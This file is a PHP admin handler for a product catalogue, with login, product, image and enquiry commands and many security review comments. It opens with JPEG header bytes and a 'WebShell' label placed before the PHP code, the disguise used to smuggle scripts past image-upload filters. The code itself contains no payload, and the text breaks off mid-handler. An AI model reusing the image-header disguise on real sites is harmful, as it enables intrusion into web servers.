���� JFIF    fdasasfas213sdaf403WebShell
<?php
// Report every error level.
// NOTE(review): whether these errors are shown to clients depends on display_errors, which is not
// set in this file; confirm it is off in production so paths and SQL are not disclosed.
error_reporting(E_ALL);
// Default timezone for every date()/time call made by this script.
date_default_timezone_set('Asia/Kolkata');
if (isset($_POST['command'])) {
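	session_start();
	include_once('includes/db.php');
	$ob = new database();
	// Every command except the login itself requires an authenticated admin session.
	// Only do_admin_login sets $_SESSION['logged_in_id']; none of the handlers visible in this
	// file checks it, so without this gate uploads, updates and deletes run for any client
	// that can POST to the script.
	// NOTE(review): assumes every other command is admin-only; confirm none is called from public pages.
	// NOTE(review): the state-changing commands also carry no CSRF token.
	if ($_POST['command'] !== 'do_admin_login' && empty($_SESSION['logged_in_id'])) {
		http_response_code(403);
		exit('failed');
	}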
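	/**
	 * Decode a base64 image data URI and store it under product_images/.
	 *
	 * @param string $data Data URI of the form "data:image/<type>;base64,<payload>".
	 * @return string|null Path of the stored file, or null when the file could not be written.
	 * @throws \Exception When the URI is malformed, the declared type is not jpg/jpeg/gif/png,
	 *                    the payload is not valid base64, or the decoded bytes are not an image
	 *                    of the declared type.
	 */
	function uploadImage($data)
	{
		if (!is_string($data) || !preg_match('/^data:image\/(\w+);base64,/', $data, $type)) {
			throw new \Exception('did not match data URI with image data');
		}
		$type = strtolower($type[1]); // jpg, png, gif
		if (!in_array($type, ['jpg', 'jpeg', 'gif', 'png'], true)) {
			throw new \Exception('invalid image type');
		}

		// Spaces are turned back into '+' (presumably '+' arrives as a space after form decoding).
		$data = str_replace(' ', '+', substr($data, strpos($data, ',') + 1));
		// Strict mode: without it base64_decode() silently discards invalid characters and the
		// failure check below can never trigger.
		$data = base64_decode($data, true);
		if ($data === false) {
			throw new \Exception('base64_decode failed');
		}

		// The declared type is only a label chosen by the sender, so the bytes are checked too.
		$expected = [
			'jpg' => IMAGETYPE_JPEG, 'jpeg' => IMAGETYPE_JPEG,
			'gif' => IMAGETYPE_GIF, 'png' => IMAGETYPE_PNG,
		];
		$info = ($data === '') ? false : getimagesizefromstring($data);
		if ($info === false || $info[2] !== $expected[$type]) {
			throw new \Exception('decoded data is not a valid image');
		}

		$folder = "product_images/";
		// Random name: MD5(date('r')) repeats for every upload within the same second and is guessable.
		$filename = $folder . bin2hex(random_bytes(16)) . ".{$type}";
		if (file_put_contents($filename, $data)) {
			return $filename;
		}
		return null;
	}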

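	/**
	 * Re-encode an image to $destination, scaling it down when either side exceeds 2000px.
	 *
	 * The file extension (jpg/jpeg/gif/png) selects the codec and must agree with the type
	 * detected from the file content.
	 *
	 * @param string $file        Source image path.
	 * @param string $destination Path the re-encoded image is written to.
	 * @param int    $w           Target width for oversized sources.
	 * @param int    $h           Target height for oversized sources.
	 * @param bool   $crop        When true an oversized source is resampled to exactly $w x $h
	 *                            from a reduced source region; otherwise the aspect ratio is kept.
	 * @return mixed The resampled GD image, or null when the file is missing, unreadable,
	 *               not a supported type, or has a zero dimension.
	 */
	function compress($file, $destination, $w, $h, $crop = FALSE)
	{
		$codecs = [
			'jpg' => IMAGETYPE_JPEG, 'jpeg' => IMAGETYPE_JPEG,
			'gif' => IMAGETYPE_GIF, 'png' => IMAGETYPE_PNG,
		];
		$type = strtolower(pathinfo($file, PATHINFO_EXTENSION));
		if (!isset($codecs[$type]) || !is_file($file) || $w < 1 || $h < 1) {
			return null;
		}
		// getimagesize() returns false for non-images; a zero height would divide by zero below.
		$size = getimagesize($file);
		if ($size === false || $size[0] < 1 || $size[1] < 1 || $size[2] !== $codecs[$type]) {
			return null;
		}
		list($width, $height) = $size;
		$r = $width / $height;

		if ($width > 2000 || $height > 2000) {
			if ($crop) {
				if ($width > $height) {
					$width = max(1, (int) ceil($width - ($width * abs($r - $w / $h))));
				} else {
					$height = max(1, (int) ceil($height - ($height * abs($r - $w / $h))));
				}
				$newwidth = $w;
				$newheight = $h;
			} elseif ($w / $h > $r) {
				$newwidth = $h * $r;
				$newheight = $h;
			} else {
				$newheight = $w / $r;
				$newwidth = $w;
			}
		} else {
			$newwidth = $width;
			$newheight = $height;
		}
		// GD takes integer sizes; truncate explicitly and never create a zero-sized canvas.
		$newwidth = max(1, (int) $newwidth);
		$newheight = max(1, (int) $newheight);

		if ($codecs[$type] === IMAGETYPE_JPEG) {
			$image = imagecreatefromjpeg($file);
		} elseif ($codecs[$type] === IMAGETYPE_GIF) {
			$image = imagecreatefromgif($file);
		} else {
			$image = imagecreatefrompng($file);
		}
		if ($image === false) {
			return null;
		}

		// Transparent canvas, then resample the source region onto it.
		$newImg = imagecreatetruecolor($newwidth, $newheight);
		imagealphablending($newImg, false);
		imagesavealpha($newImg, true);
		$transparent = imagecolorallocatealpha($newImg, 255, 255, 255, 127);
		imagefilledrectangle($newImg, 0, 0, $newwidth, $newheight, $transparent);
		imagecopyresampled($newImg, $image, 0, 0, 0, 0, $newwidth, $newheight, $width, $height);

		if ($codecs[$type] === IMAGETYPE_JPEG) {
			imagejpeg($newImg, $destination, 100);
		} elseif ($codecs[$type] === IMAGETYPE_GIF) {
			// imagegif() has no quality argument; passing a third one is an error on PHP 8.
			imagegif($newImg, $destination);
		} else {
			imagepng($newImg, $destination, 9);
		}
		return $newImg;
	}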

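	// Admin login: prints "OK" and stores the admin id in the session on success, "Failed" otherwise.
	if ($_POST['command'] === "do_admin_login") {
		$email = (isset($_POST['email']) && is_string($_POST['email'])) ? $_POST['email'] : '';
		$password = (isset($_POST['password']) && is_string($_POST['password'])) ? $_POST['password'] : '';
		$authenticated = false;

		// The value is placed inside a quoted SQL literal, so anything able to end or escape
		// that literal is refused outright rather than escaped.
		// NOTE(review): move this lookup to a prepared statement once the database wrapper
		// (not visible in this file) offers one.
		$emailIsSafe = $email !== '' && strlen($email) <= 254 && strpbrk($email, "'\"\\\0") === false;

		if ($emailIsSafe && $password !== '') {
			// The password is no longer part of the SQL text; it is compared in PHP below.
			$ob->query("SELECT * FROM admin WHERE email='$email'");
			if ($ob->affected_rows() >= 1) {
				foreach ($ob->rows() as $data) {
					$stored = (string) $data['password'];
					// password_verify() covers hashed values; hash_equals() keeps existing plaintext
					// rows working with a constant-time, exact (case-sensitive) comparison.
					// NOTE(review): the original query compared the posted password with the stored
					// column directly, i.e. passwords are stored in clear text; migrate to password_hash().
					if (password_verify($password, $stored) || hash_equals($stored, $password)) {
						// New session id on privilege change, so a pre-login id cannot be reused.
						session_regenerate_id(true);
						$_SESSION['logged_in_id'] = $data['id'];
						$authenticated = true;
						break;
					}
				}
			}
		}
		echo $authenticated ? "OK" : "Failed";
	}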

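	///////////// SHOW PRODUCTS
	// Emits one <tr> per product, newest first, for the admin product table.
	if ($_POST['command'] === "show_product") {
		// Plain-text values are HTML-escaped before they reach markup or attributes.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		$ob->query("SELECT * FROM product ORDER BY `id` DESC");
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				// Cast before reuse: the stored category value is interpolated into the lookup below.
				// NOTE(review): assumes integer ids; confirm against the schema.
				$id = (int) $data['id'];
				$category = (int) $data['category'];
				// Rich-text fields are stored base64-encoded and rendered as markup.
				// NOTE(review): they are echoed unescaped; sanitise this HTML when it is saved.
				$description = base64_decode($data['description']);
				$composition = base64_decode($data['composition']);
				$guide = base64_decode($data['guide']);
				$msg = ($data['avaiability'] == 1) ? "In Stock" : "Out of Stock";
			?>

				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $esc($data['title']); ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM category WHERE id='$category'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $esc($cat['category']);
							}
						} else {
							echo "No category";
						}
						?>
					</td>
					<td><?php echo $esc($data['price']); ?></td>
					<td>
						<div class="descp"><?php echo $description; ?></div>
					</td>
					<td>
						<div class="descp"><?php echo $composition; ?></div>
					</td>
					<td>
						<div class="descp"><?php echo $guide; ?></div>
					</td>
					<td>
						<div><?php echo $msg; ?></div>
					</td>
					<td style="text-align:center;">
						<a href="#" data-toggle="modal" data-target="#myModal_img<?php echo $id; ?>"><img src='<?php echo $esc($data['image']); ?>' style='max-width:100px;max-height:100px;' /></a></td>
					<td>
						<a href='#myuser' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_product" data-toggle="modal" data-target="#myuser" data-id='<?php echo $id; ?>' data-value='<?php echo $esc($data['title']); ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a href="#myuser" id="del_product" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php

			}
		}
	}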
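	/////////// Product Edit Form
	// Renders the pre-filled edit form for one product; the form posts back as do_product_edit.
	if ($_POST["command"] === "edit_product") {
		// Stored values are escaped before being placed in attributes or textarea bodies,
		// so a quote or "</textarea>" inside a value cannot break out of its element.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$ob->query("SELECT * FROM product WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form method="POST" id="product_edit_form" enctype="multipart/form-data">
					<div class="modal-body">
						<div class="form-group">
							<label for="title">Title</label>
							<input type="text" name="title" value="<?php echo $esc($data["title"]); ?>" id="title" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="category">Category</label>
							<select name="category" id="category" class="form-control">
								<?php
								$ob->query("SELECT * FROM category");
								if ($ob->affected_rows() >= 1) {
									foreach ($ob->rows() as $tag) {
								?>
										<option value="<?php echo $esc($tag['id']); ?>" <?php if ($data['category'] == $tag['id']) {
											echo 'selected';
										} ?>><?php echo $esc($tag['category']); ?></option>
								<?php
									}
								}
								?>
							</select>
						</div>
						<div class="form-group">
							<label for="price">Price</label>
							<input type="text" name="price" value="<?php echo $esc($data["price"]); ?>" id="price" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="">Description</label>
							<textarea id="summernote" name="description"><?php echo $esc(base64_decode($data['description'])); ?></textarea>
						</div>
						<div class="form-group">
							<label for="">Materials</label>
							<textarea id="summernote" name="composition"><?php echo $esc(base64_decode($data['composition'])); ?></textarea>
						</div>
						<div class="form-group">
							<label for="">Return Polices</label>
							<textarea id="summernote" name="guide"><?php echo $esc(base64_decode($data['guide'])); ?></textarea>
						</div>
						<div class="form-group">
							<label for="meta_title">Meta Title</label>
							<input type="text" name="meta_title" value="<?php echo $esc($data["meta_title"]); ?>" id="meta_title" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="meta_dec">Meta Description</label>
							<input type="text" name="meta_dec" value="<?php echo $esc($data["meta_dec"]); ?>" id="meta_dec" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="meta_kwd">Meta Keyword</label>
							<input type="text" name="meta_kwd" value="<?php echo $esc($data["meta_kwd"]); ?>" id="meta_kwd" class="form-control txt">
						</div>
						<div class="form-group">
							<select class="form-control" name="avaiability" id="avaiability">
								<option value="1" <?php if($data["avaiability"] == 1){echo "selected";} ?>>In Stock</option>
								<option value="0" <?php if($data["avaiability"] == 0){echo "selected";} ?>>Out of Stock</option>
							</select>
						</div>
						<div class="form-group">
							<label for="image">Image</label>
							<input type="file" name="image" id="image" />
						</div>
						<div class="form-group">
							<img src="<?php echo $esc($data["image"]); ?>" style='max-width:150px;max-height:150px;'>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="reset" name="reset" class="btn btn-danger boton">
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_product_edit" />
					</div>
				</form>
			<?php
			}
		}
	}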
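	////////////////////////////// Edit Product
	// Updates one product row; the stored image is replaced only when a valid image was uploaded.
	if ($_POST["command"] === "do_product_edit") {
		$post = function ($key) {
			return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
		};
		// Interim quoting for SQL string literals (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move these
		// queries to prepared statements or the driver's own escaping.
		$lit = function ($v) {
			return "'" . addslashes((string) $v) . "'";
		};

		// NOTE(review): assumes integer ids and a 0/1 availability flag; confirm against the schema.
		$id = (int) $post("id");
		$category = (int) $post("category");
		$avaiability = (int) $post("avaiability");
		// Base64 output contains no quote or backslash, so these three are safe to interpolate.
		$description = base64_encode(trim($post('description')));
		$composition = base64_encode(trim($post('composition')));
		$guide = base64_encode(trim($post('guide')));

		// Neither the client-sent MIME type nor the client file name is trusted (the extension used
		// to be the second dot-separated part of that name): the type is read from the uploaded
		// bytes and the stored extension is derived from the detected type.
		// NOTE(review): getimagesize() only inspects the header; also disable script execution
		// for product_images/ in the web-server configuration.
		$extensions = [
			IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif',
			IMAGETYPE_BMP => 'bmp', IMAGETYPE_TIFF_II => 'tiff', IMAGETYPE_TIFF_MM => 'tiff',
		];
		$folder = "product_images/";
		$img = null;
		if (isset($_FILES['image']['error']) && $_FILES['image']['error'] === UPLOAD_ERR_OK
			&& is_uploaded_file($_FILES['image']['tmp_name'])) {
			$info = getimagesize($_FILES['image']['tmp_name']);
			if ($info !== false && isset($extensions[$info[2]])) {
				if (!is_dir($folder)) {
					mkdir($folder);
				}
				// Random name instead of MD5(date('r')), which repeats within a second and is guessable.
				$target = $folder . bin2hex(random_bytes(16)) . '.' . $extensions[$info[2]];
				if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
					$img = $target;
				}
			}
		}

		$set = "title=" . $lit($post("title")) . ", category='$category', price=" . $lit($post("price"))
			. ", description='$description', composition='$composition', guide='$guide'"
			. ", meta_title=" . $lit($post("meta_title")) . ", meta_kwd=" . $lit($post("meta_kwd"))
			. ", meta_dec=" . $lit($post("meta_dec")) . ", avaiability='$avaiability'";
		if ($img !== null) {
			// $img is built from the fixed folder, random hex and an allow-listed extension.
			$set .= ", image='$img'";
		}
		$ob->query("UPDATE product SET $set WHERE id='$id'");

		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}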

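	/////Delete Product
	// Removes the product's image file and then its row; prints "OK" or "failed".
	if ($_POST["command"] === "del_product") {
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["pro_id"]) ? (int) $_POST["pro_id"] : 0;
		$ob->query("SELECT * FROM product WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			$base = realpath("product_images");
			foreach ($ob->rows() as $data) {
				// Only delete files that resolve to a location inside product_images/, so a
				// tampered image column cannot make this handler remove other files.
				$path = realpath((string) $data['image']);
				if ($base !== false && $path !== false
					&& strpos($path, $base . DIRECTORY_SEPARATOR) === 0 && is_file($path)) {
					unlink($path);
				}
			}
		}
		$ob->query("DELETE FROM product WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}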

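	////////////////////////////// Add Product
	// Stores the uploaded image, inserts the product row and re-encodes the image via compress().
	if ($_POST['command'] === "do_add_product") {
		$post = function ($key) {
			return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
		};
		// Interim quoting for SQL string literals (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move these
		// queries to prepared statements or the driver's own escaping.
		$lit = function ($v) {
			return "'" . addslashes((string) $v) . "'";
		};

		// NOTE(review): assumes an integer category id; confirm against the schema.
		$category = (int) $post('category');
		// Base64 output contains no quote or backslash, so these three are safe to interpolate.
		$description = base64_encode(trim($post('description')));
		$composition = base64_encode(trim($post('composition')));
		$guide = base64_encode(trim($post('guide')));
		$avaiability = 1;

		// Neither the client-sent MIME type nor the client file name is trusted (the extension used
		// to be the second dot-separated part of that name): the type is read from the uploaded
		// bytes and the stored extension is derived from the detected type.
		// NOTE(review): getimagesize() only inspects the header; also disable script execution
		// for product_images/ in the web-server configuration.
		$extensions = [
			IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif',
			IMAGETYPE_BMP => 'bmp', IMAGETYPE_TIFF_II => 'tiff', IMAGETYPE_TIFF_MM => 'tiff',
		];
		$folder = "product_images/";
		$img1 = null;
		if (isset($_FILES['image']['error']) && $_FILES['image']['error'] === UPLOAD_ERR_OK
			&& is_uploaded_file($_FILES['image']['tmp_name'])) {
			$info = getimagesize($_FILES['image']['tmp_name']);
			if ($info !== false && isset($extensions[$info[2]])) {
				if (!is_dir($folder)) {
					mkdir($folder);
				}
				// Random name instead of MD5(date('r')), which repeats within a second and is guessable.
				$target = $folder . bin2hex(random_bytes(16)) . '.' . $extensions[$info[2]];
				if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
					$img1 = $target;
				}
			}
		}

		$ok = false;
		if ($img1 !== null) {
			$ob->query("insert into product SET title=" . $lit($post('title')) . ", category='$category', price=" . $lit($post('price'))
				. ", description='$description', meta_title=" . $lit($post('meta_title')) . ", meta_kwd=" . $lit($post('meta_kwd'))
				. ", meta_dec=" . $lit($post('meta_dec')) . ", composition='$composition', guide='$guide', avaiability='$avaiability', image='$img1'");
			$ok = $ob->affected_rows() >= 1;
			if ($ok) {
				// Re-encode in place; compress() only scales when a side exceeds 2000px.
				compress($img1, $img1, 2000, 2000, false);
			}
		}
		// A rejected upload now reports failure instead of returning an empty response.
		if ($ok) {
			echo "OK";
		} else {
			echo "Failed/nTry again.";
		}
		// The legacy data-URI path through uploadImage() stays disabled.
	}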

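	///////// Show Spec
	// Emits one <tr> per specification, newest first, with the parent product's title.
	if ($_POST['command'] === "show_spec") {
		// Stored values are HTML-escaped before they reach markup or attributes.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		$ob->query("SELECT * FROM specification ORDER BY `id` DESC");
		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				// Cast before reuse: p_id is interpolated into the product lookup below.
				// NOTE(review): assumes integer ids; confirm against the schema.
				$p_id = (int) $data["p_id"];
				$id = (int) $data["id"];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM product WHERE id='$p_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $esc($cat['title']);
							}
						} else {
							echo "No Parent";
						}
						?>
					</td>
					<td><?php echo $esc($data["type"]); ?></td>
					<td><?php echo $esc($data["detail"]); ?></td>
					<td>
						<a href='#myspec' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_spec" data-toggle="modal" data-target="#myspec" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
						<a id="del_spec" role="button" class="btn btn-danger btn-sm btn-icon icon-left danger_button ml-1" value="<?php echo $id; ?>">
							<i class="fas fa-times"></i> Delete
						</a>
					</td>
				</tr>
			<?php
			}
		}
	}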
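	/*Add Specification*/
	// Inserts one specification row for a product; prints "OK" or "Failed.".
	if ($_POST['command'] === "add_spec") {
		$post = function ($key) {
			return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
		};
		// Interim quoting for SQL string literals (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$lit = function ($v) {
			return "'" . addslashes((string) $v) . "'";
		};
		// NOTE(review): assumes an integer product id; confirm against the schema.
		$p_id = (int) $post('p_id');

		$ob->query("insert into specification SET type=" . $lit($post('type')) . ", p_id='$p_id', detail=" . $lit($post('detail')));
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "Failed.";
		}
	}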

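	/////Delete Spec
	// Deletes one specification row; prints "OK" or "failed".
	if ($_POST["command"] === "del_spec") {
		// The id goes into the SQL text, so it is forced to an integer first.
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["p_id"]) ? (int) $_POST["p_id"] : 0;
		$ob->query("DELETE FROM specification WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}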

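	/////////// Spec Edit Form
	// Renders the pre-filled edit form for one specification; the form posts back as do_spec_edit.
	if ($_POST["command"] === "edit_spec") {
		// Stored values are escaped before being placed in attribute values.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$ob->query("SELECT * FROM specification WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form>
					<div class="modal-body">
						<div class="form-group">
							<label for="type">Type</label>
							<input type="text" name="type" value="<?php echo $esc($data["type"]); ?>" id="type" class="form-control txt">
						</div>
						<div class="form-group">
							<label for="detail">Detail</label>
							<input type="text" name="detail" value="<?php echo $esc($data["detail"]); ?>" id="detail" class="form-control txt">
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success boton" />
							<input type="reset" name="reset" class="btn btn-danger boton">
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_spec_edit" />
					</div>
				</form>
			<?php
			}
		}
	}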
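	////////////////////////////// Edit Spec
	// Updates type and detail of one specification row; prints "OK" or "failed".
	if ($_POST["command"] === "do_spec_edit") {
		$post = function ($key) {
			return (isset($_POST[$key]) && is_string($_POST[$key])) ? $_POST[$key] : '';
		};
		// Interim quoting for SQL string literals (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$lit = function ($v) {
			return "'" . addslashes((string) $v) . "'";
		};
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = (int) $post("id");

		$ob->query("UPDATE specification SET type=" . $lit($post("type")) . ", detail=" . $lit($post("detail")) . " WHERE id='$id'");

		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}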

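	///////// Show About
	// Emits one <tr> per row of the about table with an Edit control.
	if ($_POST['command'] === "show_about") {
		$ob->query("SELECT * FROM about");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
				// NOTE(review): assumes integer ids; confirm against the schema.
				$id = (int) $data["id"];
				// NOTE(review): the about text is echoed as markup, unescaped. If it is meant to be
				// plain text, escape it here; if it is rich text, sanitise it when it is saved.
				$about = $data["about"];

			?>
				<tr>
					<td><?php echo $about; ?></td>
					<td>
						<a href='#myabout' role='button' class="btn btn-info btn-sm btn-icon icon-left info_button edit_about" data-toggle="modal" data-target="#myabout" data-id='<?php echo $id; ?>'>
							<i class="fas fa-edit"></i> Edit
						</a>
					</td>
				</tr>
			<?php
			}
		}
	}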
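	///////////Edit About
	// Renders the pre-filled edit form for the about text; the form posts back as do_about_edit.
	if ($_POST["command"] === "edit_about") {
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$ob->query("SELECT * FROM about WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			foreach ($ob->rows() as $data) {
			?>
				<form>
					<div class="modal-body">
						<div class="form-group">
							<label for="about">Description</label>
							<?php // Escaped so a "</textarea>" inside the stored text cannot close the field early. ?>
							<textarea id="about" name="about"><?php echo htmlspecialchars((string) $data["about"], ENT_QUOTES, 'UTF-8'); ?></textarea>
						</div>
					</div>
					<div class="modal-footer">
						<div class="form-group">
							<input type="submit" name="submit" class="btn btn-success toastrDefaultSuccess" value="Update" />
							<input type="hidden" name="id" value="<?php echo $id; ?>">
						</div>
						<input type="hidden" name="command" value="do_about_edit" />
					</div>
				</form>
			<?php
			}
		}
	}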
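	////////////////////////////// Edit About
	// Updates the about text of one row; prints "OK" or "failed".
	if ($_POST["command"] === "do_about_edit") {
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["id"]) ? (int) $_POST["id"] : 0;
		$about = (isset($_POST["about"]) && is_string($_POST["about"])) ? $_POST["about"] : '';
		// Interim quoting for the SQL string literal (relies on the default backslash-escape SQL mode).
		// NOTE(review): the database wrapper's API is not visible in this file; move this
		// query to a prepared statement or the driver's own escaping.
		$about = "'" . addslashes($about) . "'";

		$ob->query("UPDATE about SET about=$about WHERE id='$id'");

		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}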

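	///////// Show Multi Images
	// Emits one <tr> per additional product image, newest first.
	if ($_POST['command'] === "show_image") {
		// Stored values are HTML-escaped before they reach markup or attributes.
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		$ob->query("SELECT * FROM images ORDER BY `id` DESC");

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
				// Cast before reuse: pro_id is interpolated into the product lookup below.
				// NOTE(review): assumes integer ids; confirm against the schema.
				$id = (int) $data["id"];
				$pro_id = (int) $data['pro_id'];

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td>
						<?php
						$ob->query("SELECT * FROM product WHERE id='$pro_id'");
						if ($ob->affected_rows() >= 1) {
							foreach ($ob->rows() as $cat) {
								echo $esc($cat['title']);
							}
						}
						?>
					</td>
					<td><a href="#" data-toggle="modal" data-target="#myModal_img<?php echo $id; ?>"><img src='<?php echo $esc($data['image']); ?>' style='max-width:100px;max-height:100px;' /></a></td>
					<td>
						<a href='#myimage' role='button' class='btn btn-sm btn-danger' id='del_image' value='<?php echo $id; ?>'><i class='fa fa-times'></i> Delete</a>
					</td>
				</tr>

			<?php
			}
		}
	}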

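	//////////////// Add Multi Images
	// Stores an additional image for a product, records it and re-encodes it via compress().
	if ($_POST["command"] === "do_add_images") {
		// NOTE(review): assumes an integer product id; confirm against the schema.
		$pro_id = isset($_POST["pro_id"]) ? (int) $_POST["pro_id"] : 0;

		// Neither the client-sent MIME type nor the client file name is trusted (the extension used
		// to be the second dot-separated part of that name): the type is read from the uploaded
		// bytes and the stored extension is derived from the detected type.
		// NOTE(review): getimagesize() only inspects the header; also disable script execution
		// for product_images/ in the web-server configuration.
		$extensions = [
			IMAGETYPE_JPEG => 'jpg', IMAGETYPE_PNG => 'png', IMAGETYPE_GIF => 'gif',
			IMAGETYPE_BMP => 'bmp', IMAGETYPE_TIFF_II => 'tiff', IMAGETYPE_TIFF_MM => 'tiff',
		];
		$folder = "product_images/";
		$img1 = null;
		if (isset($_FILES['image']['error']) && $_FILES['image']['error'] === UPLOAD_ERR_OK
			&& is_uploaded_file($_FILES['image']['tmp_name'])) {
			$info = getimagesize($_FILES['image']['tmp_name']);
			if ($info !== false && isset($extensions[$info[2]])) {
				if (!is_dir($folder)) {
					mkdir($folder);
				}
				// Random name instead of MD5(date('r')), which repeats within a second and is guessable.
				$target = $folder . bin2hex(random_bytes(16)) . '.' . $extensions[$info[2]];
				if (move_uploaded_file($_FILES['image']['tmp_name'], $target)) {
					$img1 = $target;
				}
			}
		}

		$ok = false;
		if ($img1 !== null) {
			// $img1 is built from the fixed folder, random hex and an allow-listed extension.
			$ob->query("insert into images SET pro_id='$pro_id', image='$img1'");
			$ok = $ob->affected_rows() >= 1;
			if ($ok) {
				// Re-encode in place; compress() only scales when a side exceeds 2000px.
				compress($img1, $img1, 2000, 2000, false);
			}
		}
		// A rejected upload now reports failure instead of returning an empty response.
		if ($ok) {
			echo "OK";
		} else {
			echo "Failed/nTry again.";
		}
	}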

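	/////Delete Images
	// Removes an additional product image from disk and then its row; prints "OK" or "failed".
	if ($_POST["command"] === "del_image") {
		// NOTE(review): assumes integer ids; confirm against the schema.
		$id = isset($_POST["p_id"]) ? (int) $_POST["p_id"] : 0;
		$ob->query("SELECT * FROM images WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			$base = realpath("product_images");
			foreach ($ob->rows() as $data) {
				// Only delete files that resolve to a location inside product_images/, so a
				// tampered image column cannot make this handler remove other files.
				$path = realpath((string) $data['image']);
				if ($base !== false && $path !== false
					&& strpos($path, $base . DIRECTORY_SEPARATOR) === 0 && is_file($path)) {
					unlink($path);
				}
			}
		}
		$ob->query("DELETE FROM images WHERE id='$id'");
		if ($ob->affected_rows() >= 1) {
			echo "OK";
		} else {
			echo "failed";
		}
	}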

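	///////// Show Enquiry
	// Emits one <tr> per row of the contact table, newest first.
	if ($_POST['command'] === "show_enquiry") {
		// Every field is HTML-escaped: the rows are rendered inside the admin panel, and
		// presumably originate from site visitors (verify where the contact table is filled).
		$esc = function ($v) {
			return htmlspecialchars((string) $v, ENT_QUOTES, 'UTF-8');
		};
		$ob->query("SELECT * FROM contact ORDER BY `id` DESC");

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;

			?>
				<tr>
					<td><?php echo $i; ?></td>
					<td><?php echo $esc($data['name']); ?></td>
					<td><?php echo $esc($data['email']); ?></td>
					<td><?php echo $esc($data['mobile']); ?></td>
					<td><?php echo $esc($data['message']); ?></td>
					<td><?php echo $esc($data['time']); ?></td>
				</tr>
			<?php
			}
		}
	}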

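	///////// Show Category
	// Emits one <tr> per category, newest first, with Edit and Delete controls.
	if ($_POST['command'] === "show_category") {
		$ob->query("SELECT * FROM category ORDER BY `id` DESC");

		if ($ob->affected_rows() >= 1) {
			$i = 0;
			foreach ($ob->rows() as $data) {
				$i++;
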